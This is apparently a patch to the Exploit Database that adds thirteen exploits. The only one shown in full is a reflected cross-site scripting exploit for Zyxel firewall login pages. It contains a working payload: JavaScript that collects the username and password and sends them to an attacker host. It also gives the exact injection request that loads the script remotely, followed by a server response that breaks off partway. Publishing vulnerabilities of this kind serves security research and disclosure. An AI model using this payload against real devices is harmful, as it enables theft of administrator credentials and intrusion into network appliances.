From ab1398c24c091b98369972de771fd7c652c8b4a1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 17 Apr 2019 05:02:03 +0000 Subject: [PATCH] DB: 2019-04-17 13 changes to exploits/shellcodes PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC) PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC) AdminExpress 1.2.5 - 'Folder Path' Denial of Service (PoC) Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) - Privilege Escalation Microsoft Windows 10 1809 / 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cross Process Handle Duplication Privilege Escalation Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion --- exploits/hardware/webapps/46706.txt | 80 +++++++++++++ exploits/php/webapps/46710.py | 180 ++++++++++++++++++++++++++++ exploits/windows/dos/46708.py | 22 ++++ exploits/windows/dos/46709.py | 21 ++++ exploits/windows/dos/46711.py | 21 ++++ exploits/windows/local/46707.txt | 11 ++ exploits/windows/local/46712.txt | 50 ++++++++ exploits/windows/local/46713.txt | 55 +++++++++ exploits/windows/local/46714.txt | 42 +++++++ exploits/windows/local/46715.txt | 70 +++++++++++ exploits/windows/local/46716.txt | 39 ++++++ exploits/windows/local/46717.txt | 56 +++++++++ exploits/windows/local/46718.txt | 49 ++++++++ files_exploits.csv | 13 ++ 14 files changed, 709 insertions(+) create mode 100644 exploits/hardware/webapps/46706.txt create mode 100755 exploits/php/webapps/46710.py create mode 100755 exploits/windows/dos/46708.py create mode 100755 exploits/windows/dos/46709.py create mode 100755 exploits/windows/dos/46711.py create mode 100644 exploits/windows/local/46707.txt create mode 100644 exploits/windows/local/46712.txt create mode 100644 exploits/windows/local/46713.txt create mode 100644 exploits/windows/local/46714.txt create mode 100644 exploits/windows/local/46715.txt create mode 100644 exploits/windows/local/46716.txt create mode 100644 exploits/windows/local/46717.txt create mode 100644 exploits/windows/local/46718.txt diff --git a/exploits/hardware/webapps/46706.txt b/exploits/hardware/webapps/46706.txt new file mode 100644 index 000000000..2a4d1b0f5 --- /dev/null +++ b/exploits/hardware/webapps/46706.txt @@ -0,0 +1,80 @@ +# Exploit Title: Reflected XSS on Zyxel login pages +# Date: 10 Apr 2019 +# Exploit Author: Aaron Bishop +# Vendor Homepage: https://www.zyxel.com/us/en/ +# Version: V4.31 +# Tested on: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40 - weblogin.cgi, webauth_relogin.cgi +# CVE : 2019-9955 + +1. Description +============== + +Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the +mp_idx parameter on weblogin.cgi and webauth_relogin.cgi. + +2. Proof of Concept +============= + +Host a malicious file JavaScript file named 'z', or any other single character, +locally. The contents of 'z' for the following example are: + + +----- +$("button").click(function() { + $.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname}); +}); +----- + + +Close the mp_idx variable with "; and Use the getScript functionality of jQuery +to include the malicious file: + +Request: + +GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1 +Host: $RHOST +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 + + + +Response: + +HTTP/1.1 200 OK +Date: Wed, 10 Apr 2019 23:13:39 GMT +Cache-Control: no-cache, private +Pragma: no-cache +Expires: Mon, 16 Apr 1973 13:10:00 GMT +Connection: close +Content-Type: text/html +Content-Length: 7957 + + + + + Welcome + + + + + + + + + + +